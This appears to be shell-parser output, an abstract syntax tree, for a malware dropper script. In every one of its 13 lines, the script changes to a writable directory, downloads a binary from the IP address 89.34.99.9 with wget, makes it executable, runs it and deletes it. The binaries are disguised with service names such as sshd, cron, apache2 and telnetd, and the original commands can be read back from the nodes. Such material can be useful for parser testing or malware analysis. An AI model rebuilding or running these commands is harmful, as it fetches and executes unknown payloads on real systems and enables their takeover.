ListNode(lineno=2, pos=(12, 130), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 94), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 94), word='http://89.34.99.9/ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(94, 95)),
  CommandNode(lineno=2, pos=(96, 109), parts=[
    WordNode(lineno=2, pos=(96, 101), word='chmod'),
    WordNode(lineno=2, pos=(102, 104), word='+x'),
    WordNode(lineno=2, pos=(105, 109), word='ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(109, 110)),
  CommandNode(lineno=2, pos=(111, 117), parts=[
    WordNode(lineno=2, pos=(111, 117), word='./ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(117, 118)),
  CommandNode(lineno=2, pos=(119, 130), parts=[
    WordNode(lineno=2, pos=(119, 121), word='rm'),
    WordNode(lineno=2, pos=(122, 125), word='-rf'),
    WordNode(lineno=2, pos=(126, 130), word='ntpd'),
  ]),
])
ListNode(lineno=3, pos=(131, 249), parts=[
  CommandNode(lineno=3, pos=(131, 138), parts=[
    WordNode(lineno=3, pos=(131, 133), word='cd'),
    WordNode(lineno=3, pos=(134, 138), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(139, 141)),
  CommandNode(lineno=3, pos=(142, 153), parts=[
    WordNode(lineno=3, pos=(142, 144), word='cd'),
    WordNode(lineno=3, pos=(145, 153), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(154, 156)),
  CommandNode(lineno=3, pos=(157, 164), parts=[
    WordNode(lineno=3, pos=(157, 159), word='cd'),
    WordNode(lineno=3, pos=(160, 164), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(165, 167)),
  CommandNode(lineno=3, pos=(168, 176), parts=[
    WordNode(lineno=3, pos=(168, 170), word='cd'),
    WordNode(lineno=3, pos=(171, 176), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(177, 179)),
  CommandNode(lineno=3, pos=(180, 184), parts=[
    WordNode(lineno=3, pos=(180, 182), word='cd'),
    WordNode(lineno=3, pos=(183, 184), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(184, 185)),
  CommandNode(lineno=3, pos=(186, 213), parts=[
    WordNode(lineno=3, pos=(186, 190), word='wget'),
    WordNode(lineno=3, pos=(191, 213), word='http://89.34.99.9/sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(213, 214)),
  CommandNode(lineno=3, pos=(215, 228), parts=[
    WordNode(lineno=3, pos=(215, 220), word='chmod'),
    WordNode(lineno=3, pos=(221, 223), word='+x'),
    WordNode(lineno=3, pos=(224, 228), word='sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(228, 229)),
  CommandNode(lineno=3, pos=(230, 236), parts=[
    WordNode(lineno=3, pos=(230, 236), word='./sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(236, 237)),
  CommandNode(lineno=3, pos=(238, 249), parts=[
    WordNode(lineno=3, pos=(238, 240), word='rm'),
    WordNode(lineno=3, pos=(241, 244), word='-rf'),
    WordNode(lineno=3, pos=(245, 249), word='sshd'),
  ]),
])
ListNode(lineno=4, pos=(250, 380), parts=[
  CommandNode(lineno=4, pos=(250, 257), parts=[
    WordNode(lineno=4, pos=(250, 252), word='cd'),
    WordNode(lineno=4, pos=(253, 257), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(258, 260)),
  CommandNode(lineno=4, pos=(261, 272), parts=[
    WordNode(lineno=4, pos=(261, 263), word='cd'),
    WordNode(lineno=4, pos=(264, 272), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(273, 275)),
  CommandNode(lineno=4, pos=(276, 283), parts=[
    WordNode(lineno=4, pos=(276, 278), word='cd'),
    WordNode(lineno=4, pos=(279, 283), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(284, 286)),
  CommandNode(lineno=4, pos=(287, 295), parts=[
    WordNode(lineno=4, pos=(287, 289), word='cd'),
    WordNode(lineno=4, pos=(290, 295), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(296, 298)),
  CommandNode(lineno=4, pos=(299, 303), parts=[
    WordNode(lineno=4, pos=(299, 301), word='cd'),
    WordNode(lineno=4, pos=(302, 303), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(303, 304)),
  CommandNode(lineno=4, pos=(305, 335), parts=[
    WordNode(lineno=4, pos=(305, 309), word='wget'),
    WordNode(lineno=4, pos=(310, 335), word='http://89.34.99.9/openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(335, 336)),
  CommandNode(lineno=4, pos=(337, 353), parts=[
    WordNode(lineno=4, pos=(337, 342), word='chmod'),
    WordNode(lineno=4, pos=(343, 345), word='+x'),
    WordNode(lineno=4, pos=(346, 353), word='openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(353, 354)),
  CommandNode(lineno=4, pos=(355, 364), parts=[
    WordNode(lineno=4, pos=(355, 364), word='./openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(364, 365)),
  CommandNode(lineno=4, pos=(366, 380), parts=[
    WordNode(lineno=4, pos=(366, 368), word='rm'),
    WordNode(lineno=4, pos=(369, 372), word='-rf'),
    WordNode(lineno=4, pos=(373, 380), word='openssh'),
  ]),
])
ListNode(lineno=5, pos=(381, 499), parts=[
  CommandNode(lineno=5, pos=(381, 388), parts=[
    WordNode(lineno=5, pos=(381, 383), word='cd'),
    WordNode(lineno=5, pos=(384, 388), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(389, 391)),
  CommandNode(lineno=5, pos=(392, 403), parts=[
    WordNode(lineno=5, pos=(392, 394), word='cd'),
    WordNode(lineno=5, pos=(395, 403), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(404, 406)),
  CommandNode(lineno=5, pos=(407, 414), parts=[
    WordNode(lineno=5, pos=(407, 409), word='cd'),
    WordNode(lineno=5, pos=(410, 414), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(415, 417)),
  CommandNode(lineno=5, pos=(418, 426), parts=[
    WordNode(lineno=5, pos=(418, 420), word='cd'),
    WordNode(lineno=5, pos=(421, 426), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(427, 429)),
  CommandNode(lineno=5, pos=(430, 434), parts=[
    WordNode(lineno=5, pos=(430, 432), word='cd'),
    WordNode(lineno=5, pos=(433, 434), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(434, 435)),
  CommandNode(lineno=5, pos=(436, 463), parts=[
    WordNode(lineno=5, pos=(436, 440), word='wget'),
    WordNode(lineno=5, pos=(441, 463), word='http://89.34.99.9/bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(463, 464)),
  CommandNode(lineno=5, pos=(465, 478), parts=[
    WordNode(lineno=5, pos=(465, 470), word='chmod'),
    WordNode(lineno=5, pos=(471, 473), word='+x'),
    WordNode(lineno=5, pos=(474, 478), word='bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(478, 479)),
  CommandNode(lineno=5, pos=(480, 486), parts=[
    WordNode(lineno=5, pos=(480, 486), word='./bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(486, 487)),
  CommandNode(lineno=5, pos=(488, 499), parts=[
    WordNode(lineno=5, pos=(488, 490), word='rm'),
    WordNode(lineno=5, pos=(491, 494), word='-rf'),
    WordNode(lineno=5, pos=(495, 499), word='bash'),
  ]),
])
ListNode(lineno=6, pos=(500, 618), parts=[
  CommandNode(lineno=6, pos=(500, 507), parts=[
    WordNode(lineno=6, pos=(500, 502), word='cd'),
    WordNode(lineno=6, pos=(503, 507), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(508, 510)),
  CommandNode(lineno=6, pos=(511, 522), parts=[
    WordNode(lineno=6, pos=(511, 513), word='cd'),
    WordNode(lineno=6, pos=(514, 522), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(523, 525)),
  CommandNode(lineno=6, pos=(526, 533), parts=[
    WordNode(lineno=6, pos=(526, 528), word='cd'),
    WordNode(lineno=6, pos=(529, 533), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(534, 536)),
  CommandNode(lineno=6, pos=(537, 545), parts=[
    WordNode(lineno=6, pos=(537, 539), word='cd'),
    WordNode(lineno=6, pos=(540, 545), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(546, 548)),
  CommandNode(lineno=6, pos=(549, 553), parts=[
    WordNode(lineno=6, pos=(549, 551), word='cd'),
    WordNode(lineno=6, pos=(552, 553), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(553, 554)),
  CommandNode(lineno=6, pos=(555, 582), parts=[
    WordNode(lineno=6, pos=(555, 559), word='wget'),
    WordNode(lineno=6, pos=(560, 582), word='http://89.34.99.9/tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(582, 583)),
  CommandNode(lineno=6, pos=(584, 597), parts=[
    WordNode(lineno=6, pos=(584, 589), word='chmod'),
    WordNode(lineno=6, pos=(590, 592), word='+x'),
    WordNode(lineno=6, pos=(593, 597), word='tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(597, 598)),
  CommandNode(lineno=6, pos=(599, 605), parts=[
    WordNode(lineno=6, pos=(599, 605), word='./tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(605, 606)),
  CommandNode(lineno=6, pos=(607, 618), parts=[
    WordNode(lineno=6, pos=(607, 609), word='rm'),
    WordNode(lineno=6, pos=(610, 613), word='-rf'),
    WordNode(lineno=6, pos=(614, 618), word='tftp'),
  ]),
])
ListNode(lineno=7, pos=(619, 737), parts=[
  CommandNode(lineno=7, pos=(619, 626), parts=[
    WordNode(lineno=7, pos=(619, 621), word='cd'),
    WordNode(lineno=7, pos=(622, 626), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(627, 629)),
  CommandNode(lineno=7, pos=(630, 641), parts=[
    WordNode(lineno=7, pos=(630, 632), word='cd'),
    WordNode(lineno=7, pos=(633, 641), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(642, 644)),
  CommandNode(lineno=7, pos=(645, 652), parts=[
    WordNode(lineno=7, pos=(645, 647), word='cd'),
    WordNode(lineno=7, pos=(648, 652), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(653, 655)),
  CommandNode(lineno=7, pos=(656, 664), parts=[
    WordNode(lineno=7, pos=(656, 658), word='cd'),
    WordNode(lineno=7, pos=(659, 664), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(665, 667)),
  CommandNode(lineno=7, pos=(668, 672), parts=[
    WordNode(lineno=7, pos=(668, 670), word='cd'),
    WordNode(lineno=7, pos=(671, 672), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(672, 673)),
  CommandNode(lineno=7, pos=(674, 701), parts=[
    WordNode(lineno=7, pos=(674, 678), word='wget'),
    WordNode(lineno=7, pos=(679, 701), word='http://89.34.99.9/wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(701, 702)),
  CommandNode(lineno=7, pos=(703, 716), parts=[
    WordNode(lineno=7, pos=(703, 708), word='chmod'),
    WordNode(lineno=7, pos=(709, 711), word='+x'),
    WordNode(lineno=7, pos=(712, 716), word='wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(716, 717)),
  CommandNode(lineno=7, pos=(718, 724), parts=[
    WordNode(lineno=7, pos=(718, 724), word='./wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(724, 725)),
  CommandNode(lineno=7, pos=(726, 737), parts=[
    WordNode(lineno=7, pos=(726, 728), word='rm'),
    WordNode(lineno=7, pos=(729, 732), word='-rf'),
    WordNode(lineno=7, pos=(733, 737), word='wget'),
  ]),
])
ListNode(lineno=8, pos=(738, 856), parts=[
  CommandNode(lineno=8, pos=(738, 745), parts=[
    WordNode(lineno=8, pos=(738, 740), word='cd'),
    WordNode(lineno=8, pos=(741, 745), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(746, 748)),
  CommandNode(lineno=8, pos=(749, 760), parts=[
    WordNode(lineno=8, pos=(749, 751), word='cd'),
    WordNode(lineno=8, pos=(752, 760), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(761, 763)),
  CommandNode(lineno=8, pos=(764, 771), parts=[
    WordNode(lineno=8, pos=(764, 766), word='cd'),
    WordNode(lineno=8, pos=(767, 771), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(772, 774)),
  CommandNode(lineno=8, pos=(775, 783), parts=[
    WordNode(lineno=8, pos=(775, 777), word='cd'),
    WordNode(lineno=8, pos=(778, 783), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(784, 786)),
  CommandNode(lineno=8, pos=(787, 791), parts=[
    WordNode(lineno=8, pos=(787, 789), word='cd'),
    WordNode(lineno=8, pos=(790, 791), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(791, 792)),
  CommandNode(lineno=8, pos=(793, 820), parts=[
    WordNode(lineno=8, pos=(793, 797), word='wget'),
    WordNode(lineno=8, pos=(798, 820), word='http://89.34.99.9/cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(820, 821)),
  CommandNode(lineno=8, pos=(822, 835), parts=[
    WordNode(lineno=8, pos=(822, 827), word='chmod'),
    WordNode(lineno=8, pos=(828, 830), word='+x'),
    WordNode(lineno=8, pos=(831, 835), word='cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(835, 836)),
  CommandNode(lineno=8, pos=(837, 843), parts=[
    WordNode(lineno=8, pos=(837, 843), word='./cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(843, 844)),
  CommandNode(lineno=8, pos=(845, 856), parts=[
    WordNode(lineno=8, pos=(845, 847), word='rm'),
    WordNode(lineno=8, pos=(848, 851), word='-rf'),
    WordNode(lineno=8, pos=(852, 856), word='cron'),
  ]),
])
ListNode(lineno=9, pos=(857, 971), parts=[
  CommandNode(lineno=9, pos=(857, 864), parts=[
    WordNode(lineno=9, pos=(857, 859), word='cd'),
    WordNode(lineno=9, pos=(860, 864), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(865, 867)),
  CommandNode(lineno=9, pos=(868, 879), parts=[
    WordNode(lineno=9, pos=(868, 870), word='cd'),
    WordNode(lineno=9, pos=(871, 879), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(880, 882)),
  CommandNode(lineno=9, pos=(883, 890), parts=[
    WordNode(lineno=9, pos=(883, 885), word='cd'),
    WordNode(lineno=9, pos=(886, 890), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(891, 893)),
  CommandNode(lineno=9, pos=(894, 902), parts=[
    WordNode(lineno=9, pos=(894, 896), word='cd'),
    WordNode(lineno=9, pos=(897, 902), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(903, 905)),
  CommandNode(lineno=9, pos=(906, 910), parts=[
    WordNode(lineno=9, pos=(906, 908), word='cd'),
    WordNode(lineno=9, pos=(909, 910), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(910, 911)),
  CommandNode(lineno=9, pos=(912, 938), parts=[
    WordNode(lineno=9, pos=(912, 916), word='wget'),
    WordNode(lineno=9, pos=(917, 938), word='http://89.34.99.9/ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(938, 939)),
  CommandNode(lineno=9, pos=(940, 952), parts=[
    WordNode(lineno=9, pos=(940, 945), word='chmod'),
    WordNode(lineno=9, pos=(946, 948), word='+x'),
    WordNode(lineno=9, pos=(949, 952), word='ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(952, 953)),
  CommandNode(lineno=9, pos=(954, 959), parts=[
    WordNode(lineno=9, pos=(954, 959), word='./ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(959, 960)),
  CommandNode(lineno=9, pos=(961, 971), parts=[
    WordNode(lineno=9, pos=(961, 963), word='rm'),
    WordNode(lineno=9, pos=(964, 967), word='-rf'),
    WordNode(lineno=9, pos=(968, 971), word='ftp'),
  ]),
])
ListNode(lineno=10, pos=(972, 1090), parts=[
  CommandNode(lineno=10, pos=(972, 979), parts=[
    WordNode(lineno=10, pos=(972, 974), word='cd'),
    WordNode(lineno=10, pos=(975, 979), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(980, 982)),
  CommandNode(lineno=10, pos=(983, 994), parts=[
    WordNode(lineno=10, pos=(983, 985), word='cd'),
    WordNode(lineno=10, pos=(986, 994), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(995, 997)),
  CommandNode(lineno=10, pos=(998, 1005), parts=[
    WordNode(lineno=10, pos=(998, 1000), word='cd'),
    WordNode(lineno=10, pos=(1001, 1005), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1006, 1008)),
  CommandNode(lineno=10, pos=(1009, 1017), parts=[
    WordNode(lineno=10, pos=(1009, 1011), word='cd'),
    WordNode(lineno=10, pos=(1012, 1017), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1018, 1020)),
  CommandNode(lineno=10, pos=(1021, 1025), parts=[
    WordNode(lineno=10, pos=(1021, 1023), word='cd'),
    WordNode(lineno=10, pos=(1024, 1025), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1025, 1026)),
  CommandNode(lineno=10, pos=(1027, 1054), parts=[
    WordNode(lineno=10, pos=(1027, 1031), word='wget'),
    WordNode(lineno=10, pos=(1032, 1054), word='http://89.34.99.9/pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1054, 1055)),
  CommandNode(lineno=10, pos=(1056, 1069), parts=[
    WordNode(lineno=10, pos=(1056, 1061), word='chmod'),
    WordNode(lineno=10, pos=(1062, 1064), word='+x'),
    WordNode(lineno=10, pos=(1065, 1069), word='pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1069, 1070)),
  CommandNode(lineno=10, pos=(1071, 1077), parts=[
    WordNode(lineno=10, pos=(1071, 1077), word='./pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1077, 1078)),
  CommandNode(lineno=10, pos=(1079, 1090), parts=[
    WordNode(lineno=10, pos=(1079, 1081), word='rm'),
    WordNode(lineno=10, pos=(1082, 1085), word='-rf'),
    WordNode(lineno=10, pos=(1086, 1090), word='pftp'),
  ]),
])
ListNode(lineno=11, pos=(1091, 1201), parts=[
  CommandNode(lineno=11, pos=(1091, 1098), parts=[
    WordNode(lineno=11, pos=(1091, 1093), word='cd'),
    WordNode(lineno=11, pos=(1094, 1098), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1099, 1101)),
  CommandNode(lineno=11, pos=(1102, 1113), parts=[
    WordNode(lineno=11, pos=(1102, 1104), word='cd'),
    WordNode(lineno=11, pos=(1105, 1113), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1114, 1116)),
  CommandNode(lineno=11, pos=(1117, 1124), parts=[
    WordNode(lineno=11, pos=(1117, 1119), word='cd'),
    WordNode(lineno=11, pos=(1120, 1124), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1125, 1127)),
  CommandNode(lineno=11, pos=(1128, 1136), parts=[
    WordNode(lineno=11, pos=(1128, 1130), word='cd'),
    WordNode(lineno=11, pos=(1131, 1136), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1137, 1139)),
  CommandNode(lineno=11, pos=(1140, 1144), parts=[
    WordNode(lineno=11, pos=(1140, 1142), word='cd'),
    WordNode(lineno=11, pos=(1143, 1144), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1144, 1145)),
  CommandNode(lineno=11, pos=(1146, 1171), parts=[
    WordNode(lineno=11, pos=(1146, 1150), word='wget'),
    WordNode(lineno=11, pos=(1151, 1171), word='http://89.34.99.9/sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1171, 1172)),
  CommandNode(lineno=11, pos=(1173, 1184), parts=[
    WordNode(lineno=11, pos=(1173, 1178), word='chmod'),
    WordNode(lineno=11, pos=(1179, 1181), word='+x'),
    WordNode(lineno=11, pos=(1182, 1184), word='sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1184, 1185)),
  CommandNode(lineno=11, pos=(1186, 1190), parts=[
    WordNode(lineno=11, pos=(1186, 1190), word='./sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1190, 1191)),
  CommandNode(lineno=11, pos=(1192, 1201), parts=[
    WordNode(lineno=11, pos=(1192, 1194), word='rm'),
    WordNode(lineno=11, pos=(1195, 1198), word='-rf'),
    WordNode(lineno=11, pos=(1199, 1201), word='sh'),
  ]),
])
ListNode(lineno=12, pos=(1202, 1316), parts=[
  CommandNode(lineno=12, pos=(1202, 1209), parts=[
    WordNode(lineno=12, pos=(1202, 1204), word='cd'),
    WordNode(lineno=12, pos=(1205, 1209), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1210, 1212)),
  CommandNode(lineno=12, pos=(1213, 1224), parts=[
    WordNode(lineno=12, pos=(1213, 1215), word='cd'),
    WordNode(lineno=12, pos=(1216, 1224), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1225, 1227)),
  CommandNode(lineno=12, pos=(1228, 1235), parts=[
    WordNode(lineno=12, pos=(1228, 1230), word='cd'),
    WordNode(lineno=12, pos=(1231, 1235), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1236, 1238)),
  CommandNode(lineno=12, pos=(1239, 1247), parts=[
    WordNode(lineno=12, pos=(1239, 1241), word='cd'),
    WordNode(lineno=12, pos=(1242, 1247), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1248, 1250)),
  CommandNode(lineno=12, pos=(1251, 1255), parts=[
    WordNode(lineno=12, pos=(1251, 1253), word='cd'),
    WordNode(lineno=12, pos=(1254, 1255), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1255, 1256)),
  CommandNode(lineno=12, pos=(1257, 1283), parts=[
    WordNode(lineno=12, pos=(1257, 1261), word='wget'),
    WordNode(lineno=12, pos=(1262, 1283), word='http://89.34.99.9/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1283, 1284)),
  CommandNode(lineno=12, pos=(1285, 1297), parts=[
    WordNode(lineno=12, pos=(1285, 1290), word='chmod'),
    WordNode(lineno=12, pos=(1291, 1293), word='+x'),
    WordNode(lineno=12, pos=(1294, 1297), word=' '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1297, 1298)),
  CommandNode(lineno=12, pos=(1299, 1304), parts=[
    WordNode(lineno=12, pos=(1299, 1304), word='./ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1304, 1305)),
  CommandNode(lineno=12, pos=(1306, 1316), parts=[
    WordNode(lineno=12, pos=(1306, 1308), word='rm'),
    WordNode(lineno=12, pos=(1309, 1312), word='-rf'),
    WordNode(lineno=12, pos=(1313, 1316), word=' '),
  ]),
])
ListNode(lineno=13, pos=(1317, 1447), parts=[
  CommandNode(lineno=13, pos=(1317, 1324), parts=[
    WordNode(lineno=13, pos=(1317, 1319), word='cd'),
    WordNode(lineno=13, pos=(1320, 1324), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1325, 1327)),
  CommandNode(lineno=13, pos=(1328, 1339), parts=[
    WordNode(lineno=13, pos=(1328, 1330), word='cd'),
    WordNode(lineno=13, pos=(1331, 1339), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1340, 1342)),
  CommandNode(lineno=13, pos=(1343, 1350), parts=[
    WordNode(lineno=13, pos=(1343, 1345), word='cd'),
    WordNode(lineno=13, pos=(1346, 1350), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1351, 1353)),
  CommandNode(lineno=13, pos=(1354, 1362), parts=[
    WordNode(lineno=13, pos=(1354, 1356), word='cd'),
    WordNode(lineno=13, pos=(1357, 1362), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1363, 1365)),
  CommandNode(lineno=13, pos=(1366, 1370), parts=[
    WordNode(lineno=13, pos=(1366, 1368), word='cd'),
    WordNode(lineno=13, pos=(1369, 1370), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1370, 1371)),
  CommandNode(lineno=13, pos=(1372, 1402), parts=[
    WordNode(lineno=13, pos=(1372, 1376), word='wget'),
    WordNode(lineno=13, pos=(1377, 1402), word='http://89.34.99.9/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1402, 1403)),
  CommandNode(lineno=13, pos=(1404, 1420), parts=[
    WordNode(lineno=13, pos=(1404, 1409), word='chmod'),
    WordNode(lineno=13, pos=(1410, 1412), word='+x'),
    WordNode(lineno=13, pos=(1413, 1420), word='apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1420, 1421)),
  CommandNode(lineno=13, pos=(1422, 1431), parts=[
    WordNode(lineno=13, pos=(1422, 1431), word='./apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1431, 1432)),
  CommandNode(lineno=13, pos=(1433, 1447), parts=[
    WordNode(lineno=13, pos=(1433, 1435), word='rm'),
    WordNode(lineno=13, pos=(1436, 1439), word='-rf'),
    WordNode(lineno=13, pos=(1440, 1447), word='apache2'),
  ]),
])
ListNode(lineno=14, pos=(1448, 1578), parts=[
  CommandNode(lineno=14, pos=(1448, 1455), parts=[
    WordNode(lineno=14, pos=(1448, 1450), word='cd'),
    WordNode(lineno=14, pos=(1451, 1455), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1456, 1458)),
  CommandNode(lineno=14, pos=(1459, 1470), parts=[
    WordNode(lineno=14, pos=(1459, 1461), word='cd'),
    WordNode(lineno=14, pos=(1462, 1470), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1471, 1473)),
  CommandNode(lineno=14, pos=(1474, 1481), parts=[
    WordNode(lineno=14, pos=(1474, 1476), word='cd'),
    WordNode(lineno=14, pos=(1477, 1481), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1482, 1484)),
  CommandNode(lineno=14, pos=(1485, 1493), parts=[
    WordNode(lineno=14, pos=(1485, 1487), word='cd'),
    WordNode(lineno=14, pos=(1488, 1493), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1494, 1496)),
  CommandNode(lineno=14, pos=(1497, 1501), parts=[
    WordNode(lineno=14, pos=(1497, 1499), word='cd'),
    WordNode(lineno=14, pos=(1500, 1501), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1501, 1502)),
  CommandNode(lineno=14, pos=(1503, 1533), parts=[
    WordNode(lineno=14, pos=(1503, 1507), word='wget'),
    WordNode(lineno=14, pos=(1508, 1533), word='http://89.34.99.9/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1533, 1534)),
  CommandNode(lineno=14, pos=(1535, 1551), parts=[
    WordNode(lineno=14, pos=(1535, 1540), word='chmod'),
    WordNode(lineno=14, pos=(1541, 1543), word='+x'),
    WordNode(lineno=14, pos=(1544, 1551), word='telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1551, 1552)),
  CommandNode(lineno=14, pos=(1553, 1562), parts=[
    WordNode(lineno=14, pos=(1553, 1562), word='./telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1562, 1563)),
  CommandNode(lineno=14, pos=(1564, 1578), parts=[
    WordNode(lineno=14, pos=(1564, 1566), word='rm'),
    WordNode(lineno=14, pos=(1567, 1570), word='-rf'),
    WordNode(lineno=14, pos=(1571, 1578), word='telnetd'),
  ]),
])
